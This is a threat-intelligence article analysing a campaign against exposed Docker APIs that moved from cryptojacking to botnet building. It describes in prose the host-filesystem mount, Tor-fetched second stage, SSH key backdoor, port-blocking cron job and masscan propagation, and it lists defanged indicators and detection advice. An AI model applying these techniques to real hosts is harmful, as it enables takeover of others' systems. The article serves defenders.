Docker API Threats Evolve from Cryptojacking to Botnet Infrastructure

A significant evolution in the threat landscape targeting misconfigured Docker API endpoints has been observed, shifting from simple cryptojacking operations to the establishment of a sophisticated botnet infrastructure. This campaign, first identified as a cryptojacking operation by Trend Micro in June 2025 and later analyzed in its advanced form by Akamai in August, demonstrates a strategic pivot by threat actors toward building persistent, multi-purpose attack platforms^{1, 2}. The attackers leverage the Tor network for anonymity and employ aggressive tactics to lock compromised hosts for their exclusive use, marking a dangerous escalation in cloud infrastructure targeting.

Executive Summary for Security Leadership

This campaign targets organizations with publicly exposed Docker API endpoints (port 2375), primarily affecting technology, financial services, and healthcare sectors, though any organization using containerized applications is potentially vulnerable⁷. The threat has evolved from resource theft to establishing infrastructure for future complex attacks. Initial access is gained by exploiting misconfigured Docker APIs, followed by deployment of Alpine Linux containers that mount the host filesystem for persistent access. The operation uses Tor-hidden services for command and control, making detection and attribution more difficult.

Key points for security leadership include:
* **Objective Shift:** The primary goal has moved from cryptocurrency mining to botnet recruitment and persistence.
* **Hostile Takeover:** The malware actively blocks other threat actors from accessing compromised hosts, indicating a shift toward exclusive resource control.
* **Dormant Capabilities:** The malware contains unused code for exploiting additional services (Telnet, Chrome Remote Debugging), suggesting plans for future expansion.
* **Broader Context:** This campaign exemplifies a trend where attackers chain together small weaknesses like exposed APIs and stolen tokens into significant risks¹¹.

Technical Analysis of the Attack Chain

The attack begins with reconnaissance scans from IP address `198[.]199[.]72[.]27`, which searches for exposed Docker APIs^{2, 6, 7, 9}. Upon identifying a vulnerable endpoint, attackers send an HTTP POST request to create a container from the `alpine:latest` image. A critical technique involves binding the host’s root filesystem (`/:/hostroot:rw`) to the container, enabling container escape and full host manipulation.

The container executes a Base64-encoded command that installs `curl` and `tor`, starts a Tor daemon, and verifies connectivity. This initial access phase uses Tor for anonymity, with all subsequent traffic routed through the Tor network using `socks5h` for DNS resolution and communication^{2, 6}. The malware then fetches a second-stage shell script (`docker-init.sh`) from the initial Tor hidden service (`wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion`).

The `docker-init.sh` script performs multiple malicious actions that establish persistence and prepare the system for further exploitation. It appends an attacker-controlled SSH public key to `/hostroot/root/.ssh/authorized_keys` and modifies the host’s `sshd_config` to enable root login and public key authentication, creating a reliable backdoor access method^{2, 6, 10}. The script also creates a cron job that executes every minute to block port 2375 using all available local firewall tools (`iptables`, `ufw`, `nft`), performing a “hostile takeover” of the victim host that prevents competing threat actors from accessing the API¹.

Advanced Malware Capabilities and Botnet Foundation

The script installs utilities for propagation and evasion, including `masscan`, `libpcap`, `zstd`, and `torsocks`. It sends a POST request to a command and control server (`/bot/add`) with victim IP and architecture information, then uses `torsocks` to fetch a Zstandard-compressed Go binary (`system.zst`) from a second Tor domain (`2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion`)^{1, 2}. After decompression, the binary is executed as a self-contained orchestrator.

The Go binary, which contains a “user” emoji suggesting possible LLM-assisted creation, serves as the core malware component¹. It uses `masscan` to find other hosts with port 2375 exposed and attempts to infect them using the same method, enabling self-replication across networks. The malware also actively seeks and removes containers based on `ubuntu` images, which are commonly used by other cryptojacking threat actors, effectively eliminating competition for resources¹.

The binary contains unused code for exploiting two additional ports, indicating planned future expansion. For port 23 (Telnet), it contains logic to brute-force Telnet services using a list of default router credentials, with the bizarre assumption that a successful ‘root’ login indicates a honeypot. For port 9222 (Chrome Remote Debugging), it uses the `chromedp` Go library to attach to exposed Chrome DevTools protocols, navigate to `checkip.amazonaws.com`, and report compromised hosts to a different C2 endpoint (`/httpbot/add`)¹.

Detection and Mitigation Strategies

Security teams should monitor for containers that immediately install packages (`apk`, `apt`) and then download tools (`curl`, `wget`), as this behavior is characteristic of the initial infection phase. Detection should focus on anomalous inbound connections to ports 2375, 9222, and 23, with particular scrutiny given to Base64-encoded commands executed within containers. Security systems should alert on downloader processes accessing known malicious or suspicious domains, especially `.onion` addresses, and identify unexpected stoppages of services that normally listen on a network port.

Organizations should implement network segmentation to isolate Docker environments from critical network segments and reduce exposure by never exposing the Docker API (2375/tcp), Telnet (23/tcp), or Chrome Debugger (9222/tcp) to the public internet. If remote management is essential, enforce strict authentication and bind services to `localhost` only. Implement strong authentication and authorization for the Docker API if its use is required, and change all default credentials on internet-facing devices and services. Regular security audits should be performed to check for suspicious containers and images, as recommended by Trend Micro researchers^{2, 6}.

Akamai researchers highlighted the effectiveness of honeypot techniques using the open-source Beelzebub framework, which uses YAML configurations to mimic real APIs (like Docker) and can integrate LLMs to generate dynamic, realistic responses to attacker probes. Their specific Docker API honeypot configuration is available on GitHub for organizations looking to deploy similar detection mechanisms¹.

Broader Threat Landscape Context

The Docker API campaign is not an isolated incident but part of a larger, interconnected threat landscape in mid-2025. The massive breach at AI chatbot maker Salesloft, which led to the theft of authentication tokens for integrated services like Salesforce, Slack, and Google Workspace, demonstrates the cascading risk of interconnected SaaS platforms⁸. Similar to the Docker attack’s use of Tor and `masscan`, other campaigns are abusing legitimate tools like the Velociraptor forensic framework and Visual Studio Code for command-and-control tunneling, blurring the lines between legitimate and malicious activity¹³.

Reports that over 80% of security incidents now originate from web applications accessed via browsers highlight the critical need for defense-in-depth, as adversaries target these new frontiers¹². This Docker campaign represents a strategic pivot by threat actors from simple resource theft to building infrastructure for more complex and potentially disruptive future attacks, a trend mirrored across the threat landscape¹¹.

The discovery has been widely reported across the cybersecurity industry, underscoring the evolving threat to cloud and container environments. Articles from multiple security publications have highlighted the campaign’s technical sophistication and the critical importance of securing cloud infrastructure. The consensus among researchers is that this represents a significant evolution in attacker methodology, with implications for how organizations defend their containerized environments.

Conclusion

The evolution of Docker API threats from cryptojacking to botnet recruitment represents a significant shift in attacker objectives and capabilities. This campaign demonstrates how threat actors are building more sophisticated operations that prioritize persistence and future attack potential over immediate financial gain. The use of Tor for anonymity, hostile takeover tactics to exclude competitors, and dormant capabilities for future expansion all point to a more strategic approach to compromising cloud infrastructure.

Security teams must prioritize securing Docker APIs and similar exposed services, implementing robust detection mechanisms, and maintaining awareness of the evolving tactics used by threat actors targeting containerized environments. The techniques and indicators provided in this analysis should enable organizations to better detect, prevent, and respond to these evolving threats.